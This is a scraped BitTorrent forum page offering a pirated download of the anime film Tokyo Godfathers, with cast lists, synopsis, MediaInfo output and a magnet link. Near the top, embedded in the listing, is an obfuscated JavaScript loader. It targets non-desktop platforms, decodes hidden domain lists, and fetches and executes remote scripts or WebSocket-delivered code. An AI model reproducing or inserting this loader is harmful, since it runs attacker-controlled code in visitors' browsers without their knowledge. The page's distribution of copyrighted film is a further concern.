东京教父[中文字幕].Tokyo.Godfathers.2003.1080p.迅雷下载 7.44GB

版主小s 27天前 283

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 东京教父 / Tokyo Godfathers

◎片 名 東京ゴッドファーザーズ

◎年 代 2003

◎产 地 日本

◎类 别 剧情 / 喜剧 / 动画

◎语 言 日语 / 西班牙语 / 英语

◎上映日期 2003-11-08(日本)

◎IMDb链接 https://www.imdb.com/title/tt0388473/

◎豆瓣评分 9.0/10 (152585人评价)

◎豆瓣链接 https://movie.douban.com/subject/1310177/

◎片 长 92分钟

◎导 演 今敏 Satoshi Kon (id:1053554)

古屋胜悟 Furuya Shougo (id:1307573)

◎编 剧 今敏 Satoshi Kon (id:1053554)

信本敬子 Keiko Nobumoto (id:1321091)

◎演 员 江守彻 Toru Emori (id:1008521)

梅垣义明 Yoshiaki Umegaki (id:1011748)

冈本绫 Aya Okamoto (id:1038090)

饭塚昭三 Sh?z? ?zuka (id:1020104)

加藤精三 Seiz? Kat? (id:1102698)

石丸博也 Hiroya Ishimaru (id:1009186)

槐柳二 Ry?ji Saikachi (id:1002361)

屋良有作 Y?saku Yara (id:1034285)

寺濑今日子 Ky?ko Terase (id:1160620)

能登麻美子 Mamiko Noto (id:1008256)

大塚明夫 Akio ?tsuka (id:1035615)

小山力也 Rikiya Koyama (id:1038087)

宇垣秀成 Hidenari Ugaki (id:1158177)

小形满 Mitsuru Ogata (id:1225456)

芝原智矢子 Chiyako Shibahara (id:1026723)

竹口安芸子 Akiko Takeguchi (id:1380101)

伊藤和晃 Itou Kazuaki (id:1421361)

古田信幸 Nobuyuki Furuta (id:1086613)

汤屋敦子 Atsuko Yuya (id:1052881)

堀川仁 Horikawa Jin (id:1402132)

风间勇刀 Yuto Kazama (id:1111311)

最上嗣生 Tsuguo Mogami (id:1426165)

园部好德 Yoshinori Sonobe (id:1419647)

川濑晶子 Kawase Akiko (id:1419446)

柴田理惠 Rie Shibata (id:1014925)

犬山犬子 Inuko Inuyama (id:1039597)

山寺宏一 K?ichi Yamadera (id:1019299)

柚木凉香 Ry?ka Yuzuki (id:1017047)

进藤尚美 Shindou Naomi (id:1399748)

川原庆久 Yoshihisa Kawahara (id:1321468)

麻生智久 Asou Tomohisa (id:1404543)

铃森勘司 Suzumori Kanji (id:1401452)

金田朋子 Tomoko Kaneda (id:1022523)

藤原启治 Keiji Fujiwara (id:1028837)

兴梠里美 Satomi Koorogi (id:1112135)

丸山正雄 Masao Maruyama (id:1020707)

铃木庆一 Keiichi Suzuki (id:1052012)

柏仓敦 Kashiwakura Tsutomu (id:1321013)

安藤雅司 Andou Masashi (id:1369392)

◎标 签 今敏 / 动画 / 日本 / 日本动画 / 温情 / 东京教父 / 2003 / 动漫

◎简 介

圣诞夜,退役自行车选手Gin,性倒错者花,离家出走的少女美由纪三人在东京的雪夜中无所事事。这时,他们发现垃圾堆中有一位哭泣的弃婴。孩子的襁褓中仅有一个酒吧的名片与照片。婴儿的父母身份成了谜团。花想收留孩子,并将孩子取名清子。但另外2人表示反对。于是三人开始了寻找清子父母的旅程。圣诞夜幸福的气氛,伴随的却是怀中清子的哭泣。无家可归的三个人,开始为同样无家可归的清子找寻属于她的家。这一队流浪者,在一夜经历了诸多奇妙的事件。他们能找到清子的父母吗?

  1. General

  2. Unique ID : 253134783153656688360224744786830107589 (0xBE6FFC62E77F91F04141B3740AC123C5)

  3. Complete name : Tokyo.Godfathers.2003.1080p.BluRay.DTS.x265-10bit-HDS.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 7.44 GiB

  7. Duration : 1 h 32 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 11.5 Mb/s

  10. Movie name : Tokyo Godfathers 2003 1080p BluRay DTS x265-10bit-HDS

  11. Encoded date : UTC 2021-06-30 03:05:39

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 32 min

  21. Bit rate : 7 578 kb/s

  22. Width : 1 920 pixels

  23. Height : 1 036 pixels

  24. Display aspect ratio : 1.85:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.159

  31. Stream size : 4.92 GiB (66%)

  32. Title : @HDSky

  33. Writing library : x265 - H.265/HEVC codec

  34. Default : Yes

  35. Forced : No


  36. Audio

  37. ID : 2

  38. Format : DTS XLL

  39. Format/Info : Digital Theater Systems

  40. Commercial name : DTS-HD Master Audio

  41. Codec ID : A_DTS

  42. Duration : 1 h 32 min

  43. Bit rate mode : Variable

  44. Bit rate : 3 851 kb/s

  45. Channel(s) : 6 channels

  46. Channel layout : C L R Ls Rs LFE

  47. Sampling rate : 48.0 kHz

  48. Frame rate : 93.750 FPS (512 SPF)

  49. Bit depth : 24 bits

  50. Compression mode : Lossless

  51. Stream size : 2.50 GiB (34%)

  52. Title : Japanese

  53. Language : Japanese

  54. Default : Yes

  55. Forced : No


  56. Text #1

  57. ID : 3

  58. Format : PGS

  59. Muxing mode : zlib

  60. Codec ID : S_HDMV/PGS

  61. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  62. Duration : 1 h 30 min

  63. Bit rate : 30.9 kb/s

  64. Count of elements : 2517

  65. Stream size : 20.1 MiB (0%)

  66. Title : CHS

  67. Language : Chinese

  68. Default : Yes

  69. Forced : No


  70. Text #2

  71. ID : 4

  72. Format : PGS

  73. Muxing mode : zlib

  74. Codec ID : S_HDMV/PGS

  75. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  76. Duration : 1 h 30 min

  77. Bit rate : 31.7 kb/s

  78. Count of elements : 2517

  79. Stream size : 20.6 MiB (0%)

  80. Title : CHT

  81. Language : Chinese

  82. Default : No

  83. Forced : No


  84. Menu

  85. 00:00:00.000 : en:Chapter 01

  86. 00:04:00.031 : en:Chapter 02

  87. 00:08:38.601 : en:Chapter 03

  88. 00:14:13.686 : en:Chapter 04

  89. 00:19:45.476 : en:Chapter 05

  90. 00:24:49.655 : en:Chapter 06

  91. 00:29:52.040 : en:Chapter 07

  92. 00:35:05.061 : en:Chapter 08

  93. 00:40:00.815 : en:Chapter 09

  94. 00:44:30.167 : en:Chapter 10

  95. 00:49:21.208 : en:Chapter 11

  96. 00:54:19.548 : en:Chapter 12

  97. 00:59:04.124 : en:Chapter 13

  98. 01:05:40.937 : en:Chapter 14

  99. 01:10:44.031 : en:Chapter 15

  100. 01:14:59.328 : en:Chapter 16

  101. 01:19:58.168 : en:Chapter 17

  102. 01:25:26.204 : en:Chapter 18


TAGS 剧情 动画 喜剧

磁力链:
  • magnet:?xt=urn:btih:C0042FB5C11BCDE405406B220E1771CDE98B99A3
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回